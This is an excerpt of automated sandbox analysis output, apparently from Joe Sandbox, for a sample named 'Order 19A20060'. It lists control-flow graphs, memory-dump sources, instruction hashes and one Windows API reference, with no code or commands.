                                                                              control_flow_graph 1552 6a49151-6a49185 1553 6a49187-6a4918a 1552->1553 1554 6a49190-6a491a5 1553->1554 1555 6a49a48-6a49a4b 1553->1555 1561 6a491a7-6a491ad 1554->1561 1562 6a491bd-6a491d3 1554->1562 1556 6a49a71-6a49a73 1555->1556 1557 6a49a4d-6a49a6c 1555->1557 1558 6a49a75 1556->1558 1559 6a49a7a-6a49a7d 1556->1559 1557->1556 1558->1559 1559->1553 1564 6a49a83-6a49a8d 1559->1564 1565 6a491b1-6a491b3 1561->1565 1566 6a491af 1561->1566 1569 6a491de-6a491e0 1562->1569 1565->1562 1566->1562 1570 6a491e2-6a491e8 1569->1570 1571 6a491f8-6a49269 1569->1571 1572 6a491ec-6a491ee 1570->1572 1573 6a491ea 1570->1573 1582 6a49295-6a492b1 1571->1582 1583 6a4926b-6a4928e 1571->1583 1572->1571 1573->1571 1588 6a492b3-6a492d6 1582->1588 1589 6a492dd-6a492f8 1582->1589 1583->1582 1588->1589 1594 6a49323-6a4933e 1589->1594 1595 6a492fa-6a4931c 1589->1595 1600 6a49340-6a4935c 1594->1600 1601 6a49363-6a49371 1594->1601 1595->1594 1600->1601 1602 6a49381-6a493fb 1601->1602 1603 6a49373-6a4937c 1601->1603 1609 6a493fd-6a4941b 1602->1609 1610 6a49448-6a4945d 1602->1610 1603->1564 1614 6a49437-6a49446 1609->1614 1615 6a4941d-6a4942c 1609->1615 1610->1555 1614->1609 1614->1610 1615->1614
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: b22412036bbe8c5388ffcba298557fe73b887cba6b35b9f33c2ddc6f37d212e2
                                                                              • Instruction ID: 49c99f57f6ccedaa72c9776a307b971c9c07c69e779e8f8e6cb36d54adad55cc
                                                                              • Opcode Fuzzy Hash: b22412036bbe8c5388ffcba298557fe73b887cba6b35b9f33c2ddc6f37d212e2
                                                                              • Instruction Fuzzy Hash: 13514334F002169FDB54EB75D990BAFB3F6AFC9644F148569C40ADB388DA30DC528B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1655 6a44b60-6a44b94 1656 6a44b96-6a44b99 1655->1656 1657 6a44bba-6a44bbd 1656->1657 1658 6a44b9b-6a44bb5 1656->1658 1659 6a44bc3-6a44cbb 1657->1659 1660 6a4529c-6a4529e 1657->1660 1658->1657 1678 6a44cc1-6a44d0e call 6a45418 1659->1678 1679 6a44d3e-6a44d45 1659->1679 1662 6a452a5-6a452a8 1660->1662 1663 6a452a0 1660->1663 1662->1656 1665 6a452ae-6a452bb 1662->1665 1663->1662 1692 6a44d14-6a44d30 1678->1692 1680 6a44dc9-6a44dd2 1679->1680 1681 6a44d4b-6a44dbb 1679->1681 1680->1665 1698 6a44dc6 1681->1698 1699 6a44dbd 1681->1699 1696 6a44d32 1692->1696 1697 6a44d3b-6a44d3c 1692->1697 1696->1697 1697->1679 1698->1680 1699->1698
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq
                                                                              • API String ID: 0-936005338
                                                                              • Opcode ID: 6c795f28ca7208c327a92f166225f109f00e4380168f33bfcb417431d9f082f0
                                                                              • Instruction ID: efbb7437e65188e2f54cf9f551e74f7664808621464ba8da47e73bf9ec9342ab
                                                                              • Opcode Fuzzy Hash: 6c795f28ca7208c327a92f166225f109f00e4380168f33bfcb417431d9f082f0
                                                                              • Instruction Fuzzy Hash: 98517170F102199FDB55EFA5C8547AEBBF6FF88700F208529D505AB395DA708C018B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4097023931.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_13d0000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 88997b1059cf019409113e9e64f4940e9cb38fa948b74df8a11f9c51a05e3acd
                                                                              • Instruction ID: d3d0f5ccdde044d56e0836f38aa830d4daf3e5ee0f1d3e561e43eb2e2e498595
                                                                              • Opcode Fuzzy Hash: 88997b1059cf019409113e9e64f4940e9cb38fa948b74df8a11f9c51a05e3acd
                                                                              • Instruction Fuzzy Hash: FA414272D043499FCB04DFB9D8006EEBFF5AF89210F1485AAD908A7241EB749884CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013DEC87
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4097023931.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_13d0000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
                                                                              • Instruction ID: c7a9d659e5c3b86f53ecfb6d2a4b3e9123e50d24277213cde95e95b4d3e1098d
                                                                              • Opcode Fuzzy Hash: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
                                                                              • Instruction Fuzzy Hash: BE11EFB2C0066A9BDB10DF9AD544BDEFBF4AB48324F14816AD818B7250D378A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
                                                                              • Instruction ID: 8248dcfc7c91230cf711f4f4b245de00dc0a65ca24107f5cd5453e988d764dce
                                                                              • Opcode Fuzzy Hash: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
                                                                              • Instruction Fuzzy Hash: FD418F70E0030A9FDB65FF65D89469EBBB2FF85304F20452AE406EB244DB71E946CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
                                                                              • Instruction ID: 1af12c13c8f886a691825ed7554cece5207ab07fba607a26f7845f1ce115ed54
                                                                              • Opcode Fuzzy Hash: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
                                                                              • Instruction Fuzzy Hash: 6B31C130B102058FDB59BB74D95476FB7A2AFC9200F208568E406DB394EE35DD46CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b984840c8d1320fe4de271d09ba62c2ad8882d6ebfb63da84172b286d1ec7054
                                                                              • Instruction ID: 7b5fd57feaf438ad13b327d06726adae666b922800ddf3b6d5692308f1873ea8
                                                                              • Opcode Fuzzy Hash: b984840c8d1320fe4de271d09ba62c2ad8882d6ebfb63da84172b286d1ec7054
                                                                              • Instruction Fuzzy Hash: CA328234B012199FDB54FB69E980BADB7B2FB88320F108525D40AEB355DB35EC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1987bea4f030d56f9eb5da77f0846f3a0d3f41f48a38f95e8a2638c2bc06ab8
                                                                              • Instruction ID: c616df399511bc46db046985a27feb099b682842656143a6c2edbe4db1260bb2
                                                                              • Opcode Fuzzy Hash: f1987bea4f030d56f9eb5da77f0846f3a0d3f41f48a38f95e8a2638c2bc06ab8
                                                                              • Instruction Fuzzy Hash: C261AF71F000215FCB54AB7ECC846AFAAD7AFC5624B15447AD80EDB364DEA5DD0287C2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 85bbf3a22c9c26022db17f4b0765edf41959db5704cefa8349cacbcb8c50cc2c
                                                                              • Instruction ID: 2dc5cb46132485b362ab63918983804b8f0451b571f15eab2734035b72c1e6b3
                                                                              • Opcode Fuzzy Hash: 85bbf3a22c9c26022db17f4b0765edf41959db5704cefa8349cacbcb8c50cc2c
                                                                              • Instruction Fuzzy Hash: A6812A30B102159FDF54EBA9D9947AEB7E6EFC9304F108529D40ADB395EB30EC428B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 546be1c25dc698ae34fd5e1e9f2ed766ecfd1e9f2a3382c822241707edaeeeae
                                                                              • Instruction ID: 977ac29bb01a7718d55bf625bf10b59a95a27066655bb54b902ca0dae9ad828d
                                                                              • Opcode Fuzzy Hash: 546be1c25dc698ae34fd5e1e9f2ed766ecfd1e9f2a3382c822241707edaeeeae
                                                                              • Instruction Fuzzy Hash: F2913E30E1061A8FDF60EF68C880B9DB7B1FF89304F208595D549BB255DB71AA85CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac86902ab5730b3888b7b29d7da9be33fdd67bdf0783fb4aac08b12ca79db98c
                                                                              • Instruction ID: 041c5d06544d5d8f22e90ed7a1926de03094f5b5bfccea54e5831a727db63c4b
                                                                              • Opcode Fuzzy Hash: ac86902ab5730b3888b7b29d7da9be33fdd67bdf0783fb4aac08b12ca79db98c
                                                                              • Instruction Fuzzy Hash: 89912E30E1061A8BDF60EF68C880B9DB7B1FF89304F208595D549BB355EB71AA85CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e6fbe5dc7f6ed42d5f994f32fc15a692d4aa9b7832ba77d1ba3aeb4bb725e529
                                                                              • Instruction ID: 7e4ccb8bb1425f628db34b8b34ce9024aa27335bb12ca661c158f3fac82db9d5
                                                                              • Opcode Fuzzy Hash: e6fbe5dc7f6ed42d5f994f32fc15a692d4aa9b7832ba77d1ba3aeb4bb725e529
                                                                              • Instruction Fuzzy Hash: 5D711870A002099FDB55EBA9D980AADBBF6FFC8300F249529E405EB355DB30ED46CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb7c1a67e5403fe6fe8ecba6cc94425bd62f46befe3a0da5341e347f576a2f7c
                                                                              • Instruction ID: 1686bc32a8e7f4f4d6b6bf1765d7bb6d7bfc3f407d091ba30e6ef4482fc9637c
                                                                              • Opcode Fuzzy Hash: eb7c1a67e5403fe6fe8ecba6cc94425bd62f46befe3a0da5341e347f576a2f7c
                                                                              • Instruction Fuzzy Hash: E0710870A002099FDB54EBA9D980AADBBF6FFC8304F249529E405EB355DB30ED46CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5fcc6614aba2bd14dd18688ae2701c4f7c3eae14edbc2bde0db4810d19a304f
                                                                              • Instruction ID: ba0d9e14058f825f6e60d1f472ef5b6d38ed791e6360d3a0beff231129933fae
                                                                              • Opcode Fuzzy Hash: d5fcc6614aba2bd14dd18688ae2701c4f7c3eae14edbc2bde0db4810d19a304f
                                                                              • Instruction Fuzzy Hash: 0951C031E00209DFDF64FB78E9896AEB7B2FBC5315F204869E10ADB251DB359845CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8287b038de48283f9cfc6912d77e1b9094fcef3aa7ab51fe240d2161ad130f53
                                                                              • Instruction ID: b417664380bb46095fef84e32dd2416b6727eeb7ff2397b5884c994d47d2d514
                                                                              • Opcode Fuzzy Hash: 8287b038de48283f9cfc6912d77e1b9094fcef3aa7ab51fe240d2161ad130f53
                                                                              • Instruction Fuzzy Hash: 9C51DB30B102149FEF74B76CDD9477F265ADBC9310F20553AE40AD7399CA69CC4653A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb0749b7418200bb3653e591c76d2b3f11f2f39114d4c8d79757f7250e0bb2c4
                                                                              • Instruction ID: 4adce1bf2fae30a71d63ee04eff5f20ff908fe2a0f32713f03ac1ad6365a2cac
                                                                              • Opcode Fuzzy Hash: eb0749b7418200bb3653e591c76d2b3f11f2f39114d4c8d79757f7250e0bb2c4
                                                                              • Instruction Fuzzy Hash: 8C51E930B102149FEF60B7ACDD9472F265EDBC9310F20593AE50ADB399CA69CC4643A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb738fb0a786e9b9269e972028c16b84e23f8a98e3001482f8f37d3001db6f64
                                                                              • Instruction ID: d12291609f7958669c9144a8c53bd616dab30d3751bbfbe693e7ae370701b768
                                                                              • Opcode Fuzzy Hash: eb738fb0a786e9b9269e972028c16b84e23f8a98e3001482f8f37d3001db6f64
                                                                              • Instruction Fuzzy Hash: C2414B71E006099BDB70EF99DD80ABEFBB2EB84210F10492AD25ADB654D330E855CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d38c4dbc3fc0415d8e9227bd76f2b8ba89f96e241713c5fc9274d13e6240e753
                                                                              • Instruction ID: 96d498af94994113ca1e7c3832f2340033d3f358f07c0f670de19044ae88d032
                                                                              • Opcode Fuzzy Hash: d38c4dbc3fc0415d8e9227bd76f2b8ba89f96e241713c5fc9274d13e6240e753
                                                                              • Instruction Fuzzy Hash: 67319030E1021A9FCF55FFA9C98069EB7B2FF85304F104929E405EB355EB71E94A8B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 522cf3c47481202ce2554b4005b914aac321dfaa5c459e3773406704dbcbbfc2
                                                                              • Instruction ID: 2da6bc3ead03542335982c5f01b24eaf18e3b339b99401682812932c65e8395d
                                                                              • Opcode Fuzzy Hash: 522cf3c47481202ce2554b4005b914aac321dfaa5c459e3773406704dbcbbfc2
                                                                              • Instruction Fuzzy Hash: 81316B30E102099FCB59EFA9D9546AEB7F2FF89300F108529E906EB750DB71AD42CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 59283c79d0e272857715181c4e2fce22577969ab3fad35341caab30c561c274d
                                                                              • Instruction ID: 4d7ecbd81c4e135a1855ba571b1b31ac3cf862a2029c0d3902654a752f6822d7
                                                                              • Opcode Fuzzy Hash: 59283c79d0e272857715181c4e2fce22577969ab3fad35341caab30c561c274d
                                                                              • Instruction Fuzzy Hash: 85317E30E102099BCB59EFA9D8546AEB7F2FFC9300F108529E906EB750DB71AD42CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0db1dae1f73eaaf28c950197df4dc2d27bc5ce453911fc2a1c879c9096eb040
                                                                              • Instruction ID: cb82611f9823f7ffc5e956683829c7eb83e09f460402ec63d504adabd596878b
                                                                              • Opcode Fuzzy Hash: b0db1dae1f73eaaf28c950197df4dc2d27bc5ce453911fc2a1c879c9096eb040
                                                                              • Instruction Fuzzy Hash: 89217E71F11215AFDB00EF7AEC80AEEBBF1EB88610F108025E905EB350E731D9118B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6051a6a29ff2fe1d6e96adb1a097f66ea146e8a7d3d84586c030cf46d0fbf4cd
                                                                              • Instruction ID: 95036fa5c405075106f4bc76a08dc4a29971fbfbcdf05b7192b7a8daaed67963
                                                                              • Opcode Fuzzy Hash: 6051a6a29ff2fe1d6e96adb1a097f66ea146e8a7d3d84586c030cf46d0fbf4cd
                                                                              • Instruction Fuzzy Hash: D2216B75F112159FDB40EF6AEC80AAEBBF1EB88610F108125E905EB380E731D9028B95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4096224086.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_126d000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a2f99ced797c72abaca9a5388abbd989bdd475f91bcab0537db93ac0647fb2e3
                                                                              • Instruction ID: c70ef08dd5930a79f5a0934b9a0a511e786e7c3f04c3e807cbc6dd809aac082a
                                                                              • Opcode Fuzzy Hash: a2f99ced797c72abaca9a5388abbd989bdd475f91bcab0537db93ac0647fb2e3
                                                                              • Instruction Fuzzy Hash: 9B21227161420CDFCB11DF58D980B26BBA9EB84314F20C56DD9894B296C37BD486CA62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0edb11e4948e388f67843b8f9d45ef02854fdf5e5082d2bbb28c0fd4ec2c0d1
                                                                              • Instruction ID: fad00cec8feb8407a1c5714a7deb2007659e140950a28651441971c32434ea1c
                                                                              • Opcode Fuzzy Hash: e0edb11e4948e388f67843b8f9d45ef02854fdf5e5082d2bbb28c0fd4ec2c0d1
                                                                              • Instruction Fuzzy Hash: 9F21AF30B111299FDF84FB69E8506AEB7F6EBC5310F248529E409EB344DB31EC428B80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 43852fc15bd10dbc5826d5dbf03280911390bf9d8ae91b128f4a05cb5d7f5bdc
                                                                              • Instruction ID: 19763568b0af08d5a50988764d03a05453957baea6464b2e050683b53565877a
                                                                              • Opcode Fuzzy Hash: 43852fc15bd10dbc5826d5dbf03280911390bf9d8ae91b128f4a05cb5d7f5bdc
                                                                              • Instruction Fuzzy Hash: 2A115E31B101299FDF54A669DC14AAF72FAEBC8251B10453AD50AEB344DE659C028BD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a11d2fbff13e7555884b42006f9fa8d36e86a721fbc4c03cc0e9e3bd86b68b9c
                                                                              • Instruction ID: 37b1c8890f34095bcb837e61da4838cf104009ac470dcde515245804fcd622ac
                                                                              • Opcode Fuzzy Hash: a11d2fbff13e7555884b42006f9fa8d36e86a721fbc4c03cc0e9e3bd86b68b9c
                                                                              • Instruction Fuzzy Hash: 5A01DF30B041101FDB61A6AE9850B2BBBDBEBCA710F14887AE50ACB792DE65DC0247D5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7880dd6377442f385a152e090f0b8b74e97f2a5d973568b8367f74a71bd59d41
                                                                              • Instruction ID: 14a3037723148be3a6d6802f8af1a751c5b615c3a682212324247027ccf49888
                                                                              • Opcode Fuzzy Hash: 7880dd6377442f385a152e090f0b8b74e97f2a5d973568b8367f74a71bd59d41
                                                                              • Instruction Fuzzy Hash: 2C01B174B010201FDB51F7ADA96076BB7D6EB8A704B008829F10ACB756EA24ED028380
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b0b2daeade6f7ed9833f4bd0a5972ed0e1a2c770b121e033dce2c730101f101
                                                                              • Instruction ID: 12d933246f1530ab2aaafa5c37cb047de62f7455ed1359c32df9f7c94f62457d
                                                                              • Opcode Fuzzy Hash: 2b0b2daeade6f7ed9833f4bd0a5972ed0e1a2c770b121e033dce2c730101f101
                                                                              • Instruction Fuzzy Hash: 7801D435B211256BDB54B6699C10AEF76ABDBC8260F00413AE10AD7640EE64980247E2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 79cc9d757517c163d67460078951ca5a5f46375bbfe00d3be8d89308b0dd787a
                                                                              • Instruction ID: 82287ab1354461a08b654bdff41a4bd10aa6639daeb68d272a03bcc4d5ee79bc
                                                                              • Opcode Fuzzy Hash: 79cc9d757517c163d67460078951ca5a5f46375bbfe00d3be8d89308b0dd787a
                                                                              • Instruction Fuzzy Hash: 5C018F31B101105FCB65EABCE8A0B7E63E6EBC9710F14983AE90ACB345DA61DC064795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
